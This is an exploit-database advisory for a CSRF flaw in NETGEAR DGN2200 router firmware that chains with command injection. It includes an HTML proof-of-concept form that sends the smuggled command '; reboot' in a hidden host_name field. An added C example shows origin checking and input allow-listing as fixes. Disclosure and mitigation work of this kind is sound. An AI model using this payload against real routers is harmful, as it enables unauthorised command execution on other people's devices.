NETGEAR DGN2200 v1/v2/v3/v4 - Cross-Site Request Forgery Vulnerability

ID 1337DAY-ID-27149
Type zdt
Reporter SivertPL
Modified 2017-02-28T00:00:00


Exploit for hardware platform in category web applications

# Exploit Title: NETGEAR Firmware DGN2200v1/v2/v3/v4 CSRF which leads to RCE through CVE-2017-6334
# Date: 2017-02-28
# Exploit Author: SivertPL
# Vendor Homepage:
# Software Link:
# Version: (initial) - (latest, still 0-day!)
# Tested on: DGN2200v1,v2,v3,v4
# CVE: CVE-2017-6366
A quite dangerous CSRF vulnerability was discovered in all DGN2200 firmware versions.
When chained with either CVE-2017-6077 or CVE-2017-6334, it allows unauthenticated (sic!) RCE once somebody logged in to the router is tricked into viewing a website.
<!DOCTYPE html>
<html>
    <head>
        <title>netgear router CSRF</title>
    </head>
    <body>
        <form method="POST" action="">
            <input type="hidden" name="host_name" value="; reboot"> <!-- CVE-2017-6334 payload -->
            <input type="hidden" name="lookup" value="Lookup">
            <button name="clc" value="clc">Would You Dare To?</button>
        </form>
    </body>
</html>
<!-- 2017-02-27 by SivertPL -->
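
The chain above works because the router accepts a cross-origin POST and then passes `host_name` on unchecked. The following is an added example of the two server-side checks that would each break it; it is not code from the advisory or from NETGEAR firmware. All function names are hypothetical, and the 192.168.0.1 address and attacker.example origin are constructed sample values.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <strings.h>

/* Copy the host[:port] part of "scheme://host[:port]/path" into out. */
static int url_authority(const char *url, char *out, size_t outlen) {
    const char *p = strstr(url, "://");
    if (!p) return 0;               /* also rejects the literal Origin "null" */
    p += 3;
    size_t n = strcspn(p, "/?#");
    if (n == 0 || n >= outlen) return 0;
    memcpy(out, p, n);
    out[n] = '\0';
    return 1;
}

/* CSRF check for state-changing requests: Origin (or Referer when Origin is
 * absent) must name the same authority as the Host header. Fail closed. */
int same_origin_post(const char *host, const char *origin, const char *referer) {
    char auth[256];
    const char *src = (origin && *origin) ? origin : referer;
    if (!host || !*host || !src || !*src) return 0;
    if (!url_authority(src, auth, sizeof auth)) return 0;
    return strcasecmp(auth, host) == 0;
}

/* Allow-list for host_name: letters, digits, '.' and '-', 1..253 bytes, so
 * shell metacharacters such as ';' and spaces are refused. */
int valid_host_name(const char *s) {
    size_t n = s ? strlen(s) : 0;
    if (n == 0 || n > 253 || s[0] == '-' || s[0] == '.') return 0;
    for (size_t i = 0; i < n; i++)
        if (!isalnum((unsigned char)s[i]) && s[i] != '.' && s[i] != '-')
            return 0;
    return 1;
}

/* Both layers must pass before the lookup is performed. */
int accept_lookup(const char *host, const char *origin, const char *referer,
                  const char *host_name) {
    return same_origin_post(host, origin, referer) && valid_host_name(host_name);
}

int main(void) {
    /* Constructed sample requests; 192.168.0.1 is an assumed LAN address. */
    printf("%d\n", accept_lookup("192.168.0.1", "http://192.168.0.1", NULL, "example.com"));
    printf("%d\n", accept_lookup("192.168.0.1", "http://attacker.example", NULL, "; reboot"));
    return 0;
}
```

The origin check compares host and port only, not the scheme, and a per-session anti-CSRF token would still be needed for clients that send neither Origin nor Referer.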

# [2018-01-08]  #